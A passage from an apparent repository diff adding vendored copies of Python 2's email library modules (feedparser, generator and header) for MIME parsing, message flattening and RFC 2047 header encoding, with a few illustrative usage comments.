                if line is NeedMoreData:
                    yield NeedMoreData
                    continue
                if line == '':
                    break
                mo = boundaryre.match(line)
                if mo:
                    # If we're looking at the end boundary, we're done with
                    # this multipart.  If there was a newline at the end of
                    # the closing boundary, then we need to initialize the
                    # epilogue with the empty string (see below).
                    if mo.group('end'):
                        linesep = mo.group('linesep')
                        break
                    # We saw an inter-part boundary.  Were we in the preamble?
                    if capturing_preamble:
                        if preamble:
                            # According to RFC 2046, the last newline belongs
                            # to the boundary.
                            lastline = preamble[-1]
                            eolmo = NLCRE_eol.search(lastline)
                            if eolmo:
                                preamble[-1] = lastline[:-len(eolmo.group(0))]
                            self._cur.preamble = EMPTYSTRING.join(preamble)
                        capturing_preamble = False
                        self._input.unreadline(line)
                        continue
                    # We saw a boundary separating two parts.  Consume any
                    # multiple boundary lines that may be following.  Our
                    # interpretation of RFC 2046 BNF grammar does not produce
                    # body parts within such double boundaries.
                    while True:
                        line = self._input.readline()
                        if line is NeedMoreData:
                            yield NeedMoreData
                            continue
                        mo = boundaryre.match(line)
                        if not mo:
                            self._input.unreadline(line)
                            break
                    # Recurse to parse this subpart; the input stream points
                    # at the subpart's first line.
                    self._input.push_eof_matcher(boundaryre.match)
                    for retval in self._parsegen():
                        if retval is NeedMoreData:
                            yield NeedMoreData
                            continue
                        break
                    # Because of RFC 2046, the newline preceding the boundary
                    # separator actually belongs to the boundary, not the
                    # previous subpart's payload (or epilogue if the previous
                    # part is a multipart).
                    if self._last.get_content_maintype() == 'multipart':
                        epilogue = self._last.epilogue
                        if epilogue == '':
                            self._last.epilogue = None
                        elif epilogue is not None:
                            mo = NLCRE_eol.search(epilogue)
                            if mo:
                                end = len(mo.group(0))
                                self._last.epilogue = epilogue[:-end]
                    else:
                        payload = self._last.get_payload()
                        if isinstance(payload, basestring):
                            mo = NLCRE_eol.search(payload)
                            if mo:
                                payload = payload[:-len(mo.group(0))]
                                self._last.set_payload(payload)
                    self._input.pop_eof_matcher()
                    self._pop_message()
                    # Set the multipart up for newline cleansing, which will
                    # happen if we're in a nested multipart.
                    self._last = self._cur
                else:
                    # I think we must be in the preamble
                    assert capturing_preamble
                    preamble.append(line)
            # We've seen either the EOF or the end boundary.  If we're still
            # capturing the preamble, we never saw the start boundary.  Note
            # that as a defect and store the captured text as the payload.
            # Everything from here to the EOF is epilogue.
            if capturing_preamble:
                self._cur.defects.append(errors.StartBoundaryNotFoundDefect())
                self._cur.set_payload(EMPTYSTRING.join(preamble))
                epilogue = []
                for line in self._input:
                    if line is NeedMoreData:
                        yield NeedMoreData
                        continue
                self._cur.epilogue = EMPTYSTRING.join(epilogue)
                return
            # If the end boundary ended in a newline, we'll need to make sure
            # the epilogue isn't None
            if linesep:
                epilogue = ['']
            else:
                epilogue = []
            for line in self._input:
                if line is NeedMoreData:
                    yield NeedMoreData
                    continue
                epilogue.append(line)
            # Any CRLF at the front of the epilogue is not technically part of
            # the epilogue.  Also, watch out for an empty string epilogue,
            # which means a single newline.
            if epilogue:
                firstline = epilogue[0]
                bolmo = NLCRE_bol.match(firstline)
                if bolmo:
                    epilogue[0] = firstline[len(bolmo.group(0)):]
            self._cur.epilogue = EMPTYSTRING.join(epilogue)
            return
        # Otherwise, it's some non-multipart type, so the entire rest of the
        # file contents becomes the payload.
        lines = []
        for line in self._input:
            if line is NeedMoreData:
                yield NeedMoreData
                continue
            lines.append(line)
        self._cur.set_payload(EMPTYSTRING.join(lines))

    def _parse_headers(self, lines):
        # Passed a list of lines that make up the headers for the current msg
        lastheader = ''
        lastvalue = []
        for lineno, line in enumerate(lines):
            # Check for continuation
            if line[0] in ' \t':
                if not lastheader:
                    # The first line of the headers was a continuation.  This
                    # is illegal, so let's note the defect, store the illegal
                    # line, and ignore it for purposes of headers.
                    defect = errors.FirstHeaderLineIsContinuationDefect(line)
                    self._cur.defects.append(defect)
                    continue
                lastvalue.append(line)
                continue
            if lastheader:
                # XXX reconsider the joining of folded lines
                lhdr = EMPTYSTRING.join(lastvalue)[:-1].rstrip('\r\n')
                self._cur[lastheader] = lhdr
                lastheader, lastvalue = '', []
            # Check for envelope header, i.e. unix-from
            if line.startswith('From '):
                if lineno == 0:
                    # Strip off the trailing newline
                    mo = NLCRE_eol.search(line)
                    if mo:
                        line = line[:-len(mo.group(0))]
                    self._cur.set_unixfrom(line)
                    continue
                elif lineno == len(lines) - 1:
                    # Something looking like a unix-from at the end - it's
                    # probably the first line of the body, so push back the
                    # line and stop.
                    self._input.unreadline(line)
                    return
                else:
                    # Weirdly placed unix-from line.  Note this as a defect
                    # and ignore it.
                    defect = errors.MisplacedEnvelopeHeaderDefect(line)
                    self._cur.defects.append(defect)
                    continue
            # Split the line on the colon separating field name from value.
            i = line.find(':')
            if i < 0:
                defect = errors.MalformedHeaderDefect(line)
                self._cur.defects.append(defect)
                continue
            lastheader = line[:i]
            lastvalue = [line[i+1:].lstrip()]
        # Done with all the lines, so handle the last header.
        if lastheader:
            # XXX reconsider the joining of folded lines
            self._cur[lastheader] = EMPTYSTRING.join(lastvalue).rstrip('\r\n')
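
# --- Illustrative sketch (editorial addition, not part of the upstream
# module): typical incremental use of FeedParser -- feed() arbitrary chunks,
# then close() to obtain the root Message object.
#
#   parser = FeedParser()
#   parser.feed('Subject: test\r\n')
#   parser.feed('\r\nbody line 1\r\n')
#   msg = parser.close()
#   msg['subject']       # -> 'test'
#   msg.get_payload()    # -> 'body line 1\r\n'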
BIN
PortalAuth/includes/scripts/libs/email/feedparser.pyc
Executable file
Binary file not shown.
364
PortalAuth/includes/scripts/libs/email/generator.py
Executable file
@@ -0,0 +1,364 @@
# Copyright (C) 2001-2010 Python Software Foundation
# Contact: email-sig@python.org

"""Classes to generate plain text from a message object tree."""

__all__ = ['Generator', 'DecodedGenerator']

import re
import sys
import time
import random
import warnings

from cStringIO import StringIO
from email.header import Header

UNDERSCORE = '_'
NL = '\n'

fcre = re.compile(r'^From ', re.MULTILINE)

def _is8bitstring(s):
    if isinstance(s, str):
        try:
            unicode(s, 'us-ascii')
        except UnicodeError:
            return True
    return False

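# --- Illustrative sketch (editorial addition, not part of the upstream
# module): _is8bitstring() is True only for byte strings that fail us-ascii
# decoding.
#
#   _is8bitstring('hello')        # -> False (pure ASCII bytes)
#   _is8bitstring('caf\xe9')      # -> True  (raw 8-bit byte present)
#   _is8bitstring(u'caf\xe9')     # -> False (unicode is never "8bit")
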
class Generator:
    """Generates output from a Message object tree.

    This basic generator writes the message to the given file object as plain
    text.
    """
    #
    # Public interface
    #

    def __init__(self, outfp, mangle_from_=True, maxheaderlen=78):
        """Create the generator for message flattening.

        outfp is the output file-like object for writing the message to.  It
        must have a write() method.

        Optional mangle_from_ is a flag that, when True (the default), escapes
        From_ lines in the body of the message by putting a `>' in front of
        them.

        Optional maxheaderlen specifies the longest length for a non-continued
        header.  When a header line is longer (in characters, with tabs
        expanded to 8 spaces) than maxheaderlen, the header will split as
        defined in the Header class.  Set maxheaderlen to zero to disable
        header wrapping.  The default is 78, as recommended (but not required)
        by RFC 2822.
        """
        self._fp = outfp
        self._mangle_from_ = mangle_from_
        self._maxheaderlen = maxheaderlen

    def write(self, s):
        # Just delegate to the file object
        self._fp.write(s)

    def flatten(self, msg, unixfrom=False):
        """Print the message object tree rooted at msg to the output file
        specified when the Generator instance was created.

        unixfrom is a flag that forces the printing of a Unix From_ delimiter
        before the first object in the message tree.  If the original message
        has no From_ delimiter, a `standard' one is crafted.  By default, this
        is False to inhibit the printing of any From_ delimiter.

        Note that for subobjects, no From_ line is printed.
        """
        if unixfrom:
            ufrom = msg.get_unixfrom()
            if not ufrom:
                ufrom = 'From nobody ' + time.ctime(time.time())
            print >> self._fp, ufrom
        self._write(msg)

    def clone(self, fp):
        """Clone this generator with the exact same options."""
        return self.__class__(fp, self._mangle_from_, self._maxheaderlen)

    #
    # Protected interface - undocumented ;/
    #

    def _write(self, msg):
        # We can't write the headers yet because of the following scenario:
        # say a multipart message includes the boundary string somewhere in
        # its body.  We'd have to calculate the new boundary /before/ we write
        # the headers so that we can write the correct Content-Type:
        # parameter.
        #
        # The way we do this, so as to make the _handle_*() methods simpler,
        # is to cache any subpart writes into a StringIO.  Then we write the
        # headers and the StringIO contents.  That way, subpart handlers can
        # Do The Right Thing, and can still modify the Content-Type: header if
        # necessary.
        oldfp = self._fp
        try:
            self._fp = sfp = StringIO()
            self._dispatch(msg)
        finally:
            self._fp = oldfp
        # Write the headers.  First we see if the message object wants to
        # handle that itself.  If not, we'll do it generically.
        meth = getattr(msg, '_write_headers', None)
        if meth is None:
            self._write_headers(msg)
        else:
            meth(self)
        self._fp.write(sfp.getvalue())

    def _dispatch(self, msg):
        # Get the Content-Type: for the message, then try to dispatch to
        # self._handle_<maintype>_<subtype>().  If there's no handler for the
        # full MIME type, then dispatch to self._handle_<maintype>().  If
        # that's missing too, then dispatch to self._writeBody().
        main = msg.get_content_maintype()
        sub = msg.get_content_subtype()
        specific = UNDERSCORE.join((main, sub)).replace('-', '_')
        meth = getattr(self, '_handle_' + specific, None)
        if meth is None:
            generic = main.replace('-', '_')
            meth = getattr(self, '_handle_' + generic, None)
            if meth is None:
                meth = self._writeBody
        meth(msg)

    #
    # Default handlers
    #

    def _write_headers(self, msg):
        for h, v in msg.items():
            print >> self._fp, '%s:' % h,
            if self._maxheaderlen == 0:
                # Explicit no-wrapping
                print >> self._fp, v
            elif isinstance(v, Header):
                # Header instances know what to do
                print >> self._fp, v.encode()
            elif _is8bitstring(v):
                # If we have raw 8bit data in a byte string, we have no idea
                # what the encoding is.  There is no safe way to split this
                # string.  If it's ascii-subset, then we could do a normal
                # ascii split, but if it's multibyte then we could break the
                # string.  There's no way to know so the least harm seems to
                # be to not split the string and risk it being too long.
                print >> self._fp, v
            else:
                # Header's got lots of smarts, so use it.  Note that this is
                # fundamentally broken though because we lose idempotency when
                # the header string is continued with tabs.  It will now be
                # continued with spaces.  This was reversedly broken before we
                # fixed bug 1974.  Either way, we lose.
                print >> self._fp, Header(
                    v, maxlinelen=self._maxheaderlen, header_name=h).encode()
        # A blank line always separates headers from body
        print >> self._fp

    #
    # Handlers for writing types and subtypes
    #

    def _handle_text(self, msg):
        payload = msg.get_payload()
        if payload is None:
            return
        if not isinstance(payload, basestring):
            raise TypeError('string payload expected: %s' % type(payload))
        if self._mangle_from_:
            payload = fcre.sub('>From ', payload)
        self._fp.write(payload)

    # Default body handler
    _writeBody = _handle_text

    def _handle_multipart(self, msg):
        # The trick here is to write out each part separately, merge them all
        # together, and then make sure that the boundary we've chosen isn't
        # present in the payload.
        msgtexts = []
        subparts = msg.get_payload()
        if subparts is None:
            subparts = []
        elif isinstance(subparts, basestring):
            # e.g. a non-strict parse of a message with no starting boundary.
            self._fp.write(subparts)
            return
        elif not isinstance(subparts, list):
            # Scalar payload
            subparts = [subparts]
        for part in subparts:
            s = StringIO()
            g = self.clone(s)
            g.flatten(part, unixfrom=False)
            msgtexts.append(s.getvalue())
        # BAW: What about boundaries that are wrapped in double-quotes?
        boundary = msg.get_boundary()
        if not boundary:
            # Create a boundary that doesn't appear in any of the
            # message texts.
            alltext = NL.join(msgtexts)
            boundary = _make_boundary(alltext)
            msg.set_boundary(boundary)
        # If there's a preamble, write it out, with a trailing CRLF
        if msg.preamble is not None:
            print >> self._fp, msg.preamble
        # dash-boundary transport-padding CRLF
        print >> self._fp, '--' + boundary
        # body-part
        if msgtexts:
            self._fp.write(msgtexts.pop(0))
        # *encapsulation
        # --> delimiter transport-padding
        # --> CRLF body-part
        for body_part in msgtexts:
            # delimiter transport-padding CRLF
            print >> self._fp, '\n--' + boundary
            # body-part
            self._fp.write(body_part)
        # close-delimiter transport-padding
        self._fp.write('\n--' + boundary + '--')
        if msg.epilogue is not None:
            print >> self._fp
            self._fp.write(msg.epilogue)

    def _handle_multipart_signed(self, msg):
        # The contents of signed parts has to stay unmodified in order to keep
        # the signature intact per RFC1847 2.1, so we disable header wrapping.
        # RDM: This isn't enough to completely preserve the part, but it helps.
        old_maxheaderlen = self._maxheaderlen
        try:
            self._maxheaderlen = 0
            self._handle_multipart(msg)
        finally:
            self._maxheaderlen = old_maxheaderlen

    def _handle_message_delivery_status(self, msg):
        # We can't just write the headers directly to self's file object
        # because this will leave an extra newline between the last header
        # block and the boundary.  Sigh.
        blocks = []
        for part in msg.get_payload():
            s = StringIO()
            g = self.clone(s)
            g.flatten(part, unixfrom=False)
            text = s.getvalue()
            lines = text.split('\n')
            # Strip off the unnecessary trailing empty line
            if lines and lines[-1] == '':
                blocks.append(NL.join(lines[:-1]))
            else:
                blocks.append(text)
        # Now join all the blocks with an empty line.  This has the lovely
        # effect of separating each block with an empty line, but not adding
        # an extra one after the last one.
        self._fp.write(NL.join(blocks))

    def _handle_message(self, msg):
        s = StringIO()
        g = self.clone(s)
        # The payload of a message/rfc822 part should be a multipart sequence
        # of length 1.  The zeroth element of the list should be the Message
        # object for the subpart.  Extract that object, stringify it, and
        # write it out.
        # Except, it turns out, when it's a string instead, which happens when
        # and only when HeaderParser is used on a message of mime type
        # message/rfc822.  Such messages are generated by, for example,
        # Groupwise when forwarding unadorned messages.  (Issue 7970.)  So
        # in that case we just emit the string body.
        payload = msg.get_payload()
        if isinstance(payload, list):
            g.flatten(msg.get_payload(0), unixfrom=False)
            payload = s.getvalue()
        self._fp.write(payload)

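# --- Illustrative sketch (editorial addition, not part of the upstream
# module): flattening a message tree with Generator gives more control than
# msg.as_string(), e.g. disabling From-mangling and header wrapping.
#
#   fp = StringIO()
#   g = Generator(fp, mangle_from_=False, maxheaderlen=0)
#   g.flatten(msg)            # msg: any email.message.Message tree
#   text = fp.getvalue()
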
_FMT = '[Non-text (%(type)s) part of message omitted, filename %(filename)s]'

class DecodedGenerator(Generator):
    """Generates a text representation of a message.

    Like the Generator base class, except that non-text parts are substituted
    with a format string representing the part.
    """
    def __init__(self, outfp, mangle_from_=True, maxheaderlen=78, fmt=None):
        """Like Generator.__init__() except that an additional optional
        argument is allowed.

        Walks through all subparts of a message.  If the subpart is of main
        type `text', then it prints the decoded payload of the subpart.

        Otherwise, fmt is a format string that is used instead of the message
        payload.  fmt is expanded with the following keywords (in
        %(keyword)s format):

        type       : Full MIME type of the non-text part
        maintype   : Main MIME type of the non-text part
        subtype    : Sub-MIME type of the non-text part
        filename   : Filename of the non-text part
        description: Description associated with the non-text part
        encoding   : Content transfer encoding of the non-text part

        The default value for fmt is None, meaning

        [Non-text (%(type)s) part of message omitted, filename %(filename)s]
        """
        Generator.__init__(self, outfp, mangle_from_, maxheaderlen)
        if fmt is None:
            self._fmt = _FMT
        else:
            self._fmt = fmt

    def _dispatch(self, msg):
        for part in msg.walk():
            maintype = part.get_content_maintype()
            if maintype == 'text':
                print >> self, part.get_payload(decode=True)
            elif maintype == 'multipart':
                # Just skip this
                pass
            else:
                print >> self, self._fmt % {
                    'type'       : part.get_content_type(),
                    'maintype'   : part.get_content_maintype(),
                    'subtype'    : part.get_content_subtype(),
                    'filename'   : part.get_filename('[no filename]'),
                    'description': part.get('Content-Description',
                                            '[no description]'),
                    'encoding'   : part.get('Content-Transfer-Encoding',
                                            '[no encoding]'),
                    }

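# --- Illustrative sketch (editorial addition, not part of the upstream
# module): DecodedGenerator prints decoded text parts and substitutes the
# format template for everything else.
#
#   fp = StringIO()
#   DecodedGenerator(fp, fmt='[skipped %(type)s]').flatten(msg)
#   fp.getvalue()   # text parts decoded; e.g. '[skipped image/png]' elsewhere
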
# Helper
_width = len(repr(sys.maxint-1))
_fmt = '%%0%dd' % _width

def _make_boundary(text=None):
    # Craft a random boundary.  If text is given, ensure that the chosen
    # boundary doesn't appear in the text.
    token = random.randrange(sys.maxint)
    boundary = ('=' * 15) + (_fmt % token) + '=='
    if text is None:
        return boundary
    b = boundary
    counter = 0
    while True:
        cre = re.compile('^--' + re.escape(b) + '(--)?$', re.MULTILINE)
        if not cre.search(text):
            break
        b = boundary + '.' + str(counter)
        counter += 1
    return b
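
# --- Illustrative sketch (editorial addition, not part of the upstream
# module): _make_boundary() appends '.<counter>' until the boundary no longer
# occurs in the given text.  Seeding random makes the collision reproducible.
#
#   import random
#   random.seed(42); b = _make_boundary()
#   random.seed(42); _make_boundary('--' + b)   # collides -> returns b + '.0'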
514
PortalAuth/includes/scripts/libs/email/header.py
Executable file
@@ -0,0 +1,514 @@
# Copyright (C) 2002-2006 Python Software Foundation
# Author: Ben Gertzfield, Barry Warsaw
# Contact: email-sig@python.org

"""Header encoding and decoding functionality."""

__all__ = [
    'Header',
    'decode_header',
    'make_header',
    ]

import re
import binascii

import email.quoprimime
import email.base64mime

from email.errors import HeaderParseError
from email.charset import Charset

NL = '\n'
SPACE = ' '
USPACE = u' '
SPACE8 = ' ' * 8
UEMPTYSTRING = u''

MAXLINELEN = 76

USASCII = Charset('us-ascii')
UTF8 = Charset('utf-8')

# Match encoded-word strings in the form =?charset?q?Hello_World?=
ecre = re.compile(r'''
  =\?                   # literal =?
  (?P<charset>[^?]*?)   # non-greedy up to the next ? is the charset
  \?                    # literal ?
  (?P<encoding>[qb])    # either a "q" or a "b", case insensitive
  \?                    # literal ?
  (?P<encoded>.*?)      # non-greedy up to the next ?= is the encoded string
  \?=                   # literal ?=
  (?=[ \t]|$)           # whitespace or the end of the string
  ''', re.VERBOSE | re.IGNORECASE | re.MULTILINE)

# Field name regexp, including trailing colon, but not separating whitespace,
# according to RFC 2822.  Character range is from tilde to exclamation mark.
# For use with .match()
fcre = re.compile(r'[\041-\176]+:$')

# Find a header embedded in a putative header value.  Used to check for
# header injection attack.
_embeded_header = re.compile(r'\n[^ \t]+:')

# Helpers
_max_append = email.quoprimime._max_append

def decode_header(header):
    """Decode a message header value without converting charset.

    Returns a list of (decoded_string, charset) pairs containing each of the
    decoded parts of the header.  Charset is None for non-encoded parts of the
    header, otherwise a lower-case string containing the name of the character
    set specified in the encoded string.

    An email.errors.HeaderParseError may be raised when certain decoding
    errors occur (e.g. a base64 decoding exception).
    """
    # If no encoding, just return the header
    header = str(header)
    if not ecre.search(header):
        return [(header, None)]
    decoded = []
    dec = ''
    for line in header.splitlines():
        # This line might not have an encoding in it
        if not ecre.search(line):
            decoded.append((line, None))
            continue
        parts = ecre.split(line)
        while parts:
            unenc = parts.pop(0).strip()
            if unenc:
                # Should we continue a long line?
                if decoded and decoded[-1][1] is None:
                    decoded[-1] = (decoded[-1][0] + SPACE + unenc, None)
                else:
                    decoded.append((unenc, None))
            if parts:
                charset, encoding = [s.lower() for s in parts[0:2]]
                encoded = parts[2]
                dec = None
                if encoding == 'q':
                    dec = email.quoprimime.header_decode(encoded)
                elif encoding == 'b':
                    paderr = len(encoded) % 4   # Postel's law: add missing padding
                    if paderr:
                        encoded += '==='[:4 - paderr]
                    try:
                        dec = email.base64mime.decode(encoded)
                    except binascii.Error:
                        # Turn this into a higher level exception.  BAW: Right
                        # now we throw the lower level exception away but
                        # when/if we get exception chaining, we'll preserve it.
                        raise HeaderParseError
                if dec is None:
                    dec = encoded

                if decoded and decoded[-1][1] == charset:
                    decoded[-1] = (decoded[-1][0] + dec, decoded[-1][1])
                else:
                    decoded.append((dec, charset))
            del parts[0:3]
    return decoded

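# --- Illustrative sketch (editorial addition, not part of the upstream
# module): decode_header() splits a header value into (bytes, charset) pairs.
#
#   decode_header('=?iso-8859-1?q?Caf=E9?= menu')
#   # -> [('Caf\xe9', 'iso-8859-1'), ('menu', None)]
#   decode_header('plain text')
#   # -> [('plain text', None)]
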
def make_header(decoded_seq, maxlinelen=None, header_name=None,
                continuation_ws=' '):
    """Create a Header from a sequence of pairs as returned by decode_header()

    decode_header() takes a header value string and returns a sequence of
    pairs of the format (decoded_string, charset) where charset is the string
    name of the character set.

    This function takes one of those sequences of pairs and returns a Header
    instance.  Optional maxlinelen, header_name, and continuation_ws are as in
    the Header constructor.
    """
    h = Header(maxlinelen=maxlinelen, header_name=header_name,
               continuation_ws=continuation_ws)
    for s, charset in decoded_seq:
        # None means us-ascii but we can simply pass it on to h.append()
        if charset is not None and not isinstance(charset, Charset):
            charset = Charset(charset)
        h.append(s, charset)
    return h

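# --- Illustrative sketch (editorial addition, not part of the upstream
# module): round-tripping a value through decode_header() and make_header().
#
#   pairs = decode_header('=?utf-8?b?SMOpbGxv?= world')
#   h = make_header(pairs, header_name='Subject')
#   str(h)    # re-encoded, RFC 2047 compliant header value
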
class Header:
    def __init__(self, s=None, charset=None,
                 maxlinelen=None, header_name=None,
                 continuation_ws=' ', errors='strict'):
        """Create a MIME-compliant header that can contain many character sets.

        Optional s is the initial header value.  If None, the initial header
        value is not set.  You can later append to the header with .append()
        method calls.  s may be a byte string or a Unicode string, but see the
        .append() documentation for semantics.

        Optional charset serves two purposes: it has the same meaning as the
        charset argument to the .append() method.  It also sets the default
        character set for all subsequent .append() calls that omit the charset
        argument.  If charset is not provided in the constructor, the us-ascii
        charset is used both as s's initial charset and as the default for
        subsequent .append() calls.

        The maximum line length can be specified explicitly via maxlinelen.
        For splitting the first line to a shorter value (to account for the
        field header which isn't included in s, e.g. `Subject') pass in the
        name of the field in header_name.  The default maxlinelen is 76.

        continuation_ws must be RFC 2822 compliant folding whitespace (usually
        either a space or a hard tab) which will be prepended to continuation
        lines.

        errors is passed through to the .append() call.
        """
        if charset is None:
            charset = USASCII
        if not isinstance(charset, Charset):
            charset = Charset(charset)
        self._charset = charset
        self._continuation_ws = continuation_ws
        cws_expanded_len = len(continuation_ws.replace('\t', SPACE8))
        # BAW: I believe `chunks' and `maxlinelen' should be non-public.
        self._chunks = []
        if s is not None:
            self.append(s, charset, errors)
        if maxlinelen is None:
            maxlinelen = MAXLINELEN
        if header_name is None:
            # We don't know anything about the field header so the first line
            # is the same length as subsequent lines.
            self._firstlinelen = maxlinelen
        else:
            # The first line should be shorter to take into account the field
            # header.  Also subtract off 2 extra for the colon and space.
            self._firstlinelen = maxlinelen - len(header_name) - 2
        # Second and subsequent lines should subtract off the length in
        # columns of the continuation whitespace prefix.
        self._maxlinelen = maxlinelen - cws_expanded_len

    def __str__(self):
        """A synonym for self.encode()."""
        return self.encode()

    def __unicode__(self):
        """Helper for the built-in unicode function."""
        uchunks = []
        lastcs = None
        for s, charset in self._chunks:
            # We must preserve spaces between encoded and non-encoded word
            # boundaries, which means for us we need to add a space when we go
            # from a charset to None/us-ascii, or from None/us-ascii to a
            # charset.  Only do this for the second and subsequent chunks.
            nextcs = charset
            if uchunks:
                if lastcs not in (None, 'us-ascii'):
                    if nextcs in (None, 'us-ascii'):
                        uchunks.append(USPACE)
                        nextcs = None
                elif nextcs not in (None, 'us-ascii'):
                    uchunks.append(USPACE)
            lastcs = nextcs
            uchunks.append(unicode(s, str(charset)))
        return UEMPTYSTRING.join(uchunks)

    # Rich comparison operators for equality only.  BAW: does it make sense to
    # have or explicitly disable <, <=, >, >= operators?
    def __eq__(self, other):
        # other may be a Header or a string.  Both are fine so coerce
        # ourselves to a string, swap the args and do another comparison.
        return other == self.encode()

    def __ne__(self, other):
        return not self == other

    def append(self, s, charset=None, errors='strict'):
        """Append a string to the MIME header.

        Optional charset, if given, should be a Charset instance or the name
        of a character set (which will be converted to a Charset instance).  A
        value of None (the default) means that the charset given in the
        constructor is used.

        s may be a byte string or a Unicode string.  If it is a byte string
        (i.e. isinstance(s, str) is true), then charset is the encoding of
        that byte string, and a UnicodeError will be raised if the string
        cannot be decoded with that charset.  If s is a Unicode string, then
        charset is a hint specifying the character set of the characters in
        the string.  In this case, when producing an RFC 2822 compliant header
        using RFC 2047 rules, the Unicode string will be encoded using the
        following charsets in order: us-ascii, the charset hint, utf-8.  The
        first character set not to provoke a UnicodeError is used.

        Optional `errors' is passed as the third argument to any unicode() or
        ustr.encode() call.
        """
        if charset is None:
            charset = self._charset
        elif not isinstance(charset, Charset):
            charset = Charset(charset)
        # If the charset is our faux 8bit charset, leave the string unchanged
        if charset != '8bit':
            # We need to test that the string can be converted to unicode and
            # back to a byte string, given the input and output codecs of the
            # charset.
            if isinstance(s, str):
                # Possibly raise UnicodeError if the byte string can't be
                # converted to a unicode with the input codec of the charset.
                incodec = charset.input_codec or 'us-ascii'
                ustr = unicode(s, incodec, errors)
                # Now make sure that the unicode could be converted back to a
                # byte string with the output codec, which may be different
                # than the input codec.  Still, use the original byte string.
                outcodec = charset.output_codec or 'us-ascii'
                ustr.encode(outcodec, errors)
            elif isinstance(s, unicode):
                # Now we have to be sure the unicode string can be converted
                # to a byte string with a reasonable output codec.  We want to
                # use the byte string in the chunk.
                for charset in USASCII, charset, UTF8:
                    try:
                        outcodec = charset.output_codec or 'us-ascii'
                        s = s.encode(outcodec, errors)
                        break
                    except UnicodeError:
                        pass
                else:
                    assert False, 'utf-8 conversion failed'
        self._chunks.append((s, charset))

    def _split(self, s, charset, maxlinelen, splitchars):
        # Split up a header safely for use with encode_chunks.
        splittable = charset.to_splittable(s)
        encoded = charset.from_splittable(splittable, True)
        elen = charset.encoded_header_len(encoded)
        # If the line's encoded length fits, just return it
        if elen <= maxlinelen:
            return [(encoded, charset)]
        # If we have undetermined raw 8bit characters sitting in a byte
        # string, we really don't know what the right thing to do is.  We
        # can't really split it because it might be multibyte data which we
        # could break if we split it between pairs.  The least harm seems to
        # be to not split the header at all, but that means they could go out
        # longer than maxlinelen.
        if charset == '8bit':
            return [(s, charset)]
        # BAW: I'm not sure what the right test here is.  What we're trying to
        # do is be faithful to RFC 2822's recommendation that ($2.2.3):
        #
        # "Note: Though structured field bodies are defined in such a way that
        #  folding can take place between many of the lexical tokens (and even
        #  within some of the lexical tokens), folding SHOULD be limited to
        #  placing the CRLF at higher-level syntactic breaks."
        #
        # For now, I can only imagine doing this when the charset is us-ascii,
        # although it's possible that other charsets may also benefit from the
        # higher-level syntactic breaks.
        elif charset == 'us-ascii':
            return self._split_ascii(s, charset, maxlinelen, splitchars)
        # BAW: should we use encoded?
        elif elen == len(s):
            # We can split on _maxlinelen boundaries because we know that the
            # encoding won't change the size of the string
            splitpnt = maxlinelen
            first = charset.from_splittable(splittable[:splitpnt], False)
            last = charset.from_splittable(splittable[splitpnt:], False)
        else:
            # Binary search for split point
            first, last = _binsplit(splittable, charset, maxlinelen)
        # first is of the proper length so just wrap it in the appropriate
        # chrome.  last must be recursively split.
        fsplittable = charset.to_splittable(first)
        fencoded = charset.from_splittable(fsplittable, True)
        chunk = [(fencoded, charset)]
        return chunk + self._split(last, charset, self._maxlinelen, splitchars)

    def _split_ascii(self, s, charset, firstlen, splitchars):
        chunks = _split_ascii(s, firstlen, self._maxlinelen,
                              self._continuation_ws, splitchars)
        return zip(chunks, [charset]*len(chunks))

    def _encode_chunks(self, newchunks, maxlinelen):
        # MIME-encode a header with many different charsets and/or encodings.
        #
        # Given a list of pairs (string, charset), return a MIME-encoded
        # string suitable for use in a header field.  Each pair may have
        # different charsets and/or encodings, and the resulting header will
        # accurately reflect each setting.
        #
        # Each encoding can be email.utils.QP (quoted-printable, for
        # ASCII-like character sets like iso-8859-1), email.utils.BASE64
        # (Base64, for non-ASCII like character sets like KOI8-R and
        # iso-2022-jp), or None (no encoding).
        #
        # Each pair will be represented on a separate line; the resulting
        # string will be in the format:
        #
        # =?charset1?q?Mar=EDa_Gonz=E1lez_Alonso?=\n
        #  =?charset2?b?SvxyZ2VuIEL2aW5n?="
        chunks = []
        for header, charset in newchunks:
            if not header:
                continue
            if charset is None or charset.header_encoding is None:
                s = header
            else:
                s = charset.header_encode(header)
            # Don't add more folding whitespace than necessary
            if chunks and chunks[-1].endswith(' '):
                extra = ''
            else:
                extra = ' '
            _max_append(chunks, s, maxlinelen, extra)
        joiner = NL + self._continuation_ws
        return joiner.join(chunks)

    def encode(self, splitchars=';, '):
        """Encode a message header into an RFC-compliant format.

        There are many issues involved in converting a given string for use in
        an email header.  Only certain character sets are readable in most
        email clients, and as header strings can only contain a subset of
        7-bit ASCII, care must be taken to properly convert and encode (with
        Base64 or quoted-printable) header strings.  In addition, there is a
        75-character length limit on any given encoded header field, so
        line-wrapping must be performed, even with double-byte character sets.

        This method will do its best to convert the string to the correct
        character set used in email, and encode and line wrap it safely with
        the appropriate scheme for that character set.

        If the given charset is not known or an error occurs during
        conversion, this function will return the header untouched.

        Optional splitchars is a string containing characters to split long
        ASCII lines on, in rough support of RFC 2822's `highest level
        syntactic breaks'.  This doesn't affect RFC 2047 encoded lines.
        """
        newchunks = []
        maxlinelen = self._firstlinelen
        lastlen = 0
        for s, charset in self._chunks:
            # The first bit of the next chunk should be just long enough to
            # fill the next line.  Don't forget the space separating the
            # encoded words.
            targetlen = maxlinelen - lastlen - 1
            if targetlen < charset.encoded_header_len(''):
                # Stick it on the next line
                targetlen = maxlinelen
            newchunks += self._split(s, charset, targetlen, splitchars)
            lastchunk, lastcharset = newchunks[-1]
            lastlen = lastcharset.encoded_header_len(lastchunk)
        value = self._encode_chunks(newchunks, maxlinelen)
        if _embeded_header.search(value):
            raise HeaderParseError("header value appears to contain "
                                   "an embedded header: {!r}".format(value))
        return value

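# --- Illustrative sketch (editorial addition, not part of the upstream
# module): building a mixed-charset header with append() and encoding it.
#
#   h = Header('Hello ', charset='us-ascii', header_name='Subject')
#   h.append('G\xfcnther', 'iso-8859-1')
#   h.encode()   # -> something like 'Hello =?iso-8859-1?q?G=FCnther?='
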
def _split_ascii(s, firstlen, restlen, continuation_ws, splitchars):
    lines = []
    maxlen = firstlen
    for line in s.splitlines():
        # Ignore any leading whitespace (i.e. continuation whitespace) already
        # on the line, since we'll be adding our own.
        line = line.lstrip()
        if len(line) < maxlen:
            lines.append(line)
            maxlen = restlen
            continue
        # Attempt to split the line at the highest-level syntactic break
        # possible.  Note that we don't have a lot of smarts about field
        # syntax; we just try to break on semi-colons, then commas, then
        # whitespace.
        for ch in splitchars:
            if ch in line:
                break
        else:
